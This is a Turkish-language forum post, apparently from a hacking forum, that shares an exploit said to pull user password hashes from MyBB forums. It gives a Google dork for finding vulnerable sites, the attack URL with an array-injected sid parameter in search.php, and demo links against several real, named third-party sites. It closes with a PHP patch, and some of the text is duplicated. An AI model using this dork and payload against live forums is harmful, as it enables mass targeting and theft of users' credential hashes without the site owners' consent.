meraba arkadaslar forumda yeniyim umarim kalici olurum ilk paylaşimi mi size sunuyorum.
mybb'nin son surumunde bu acık mevcuttur useer hash cekilebilir.
Exploit :
Demo :
açıgı kapatmak icin sitenizde mybb kurulu dizinde search.php yi acin
bu kod ile
Bu kodu degistirin
mybb'nin son surumunde bu acık mevcuttur useer hash cekilebilir.
Exploit :
Kod:
Google Dork: intext:"powered by Mybb"
search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=Demo :
Kod:
http://community.mybb.com/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://www.mybb.fr/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
http://my-bb.ir/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=
birtane de heçkir sitesinden demo vereyim :
http://whitesecurity.org/search.php?action=results&sid[0]=9afaea732cb32f06fa34b1888bd237e2&sortby=&order=açıgı kapatmak icin sitenizde mybb kurulu dizinde search.php yi acin
bu kod ile
Kod:
$sid = $db->escape_string($mybb->input['sid']);Bu kodu degistirin
Kod:
if(is_array($mybb->input['sid']))
$sid = $db->escape_string(implode($mybb->input['sid']));
else
$sid = $db->escape_string($mybb->input['sid']);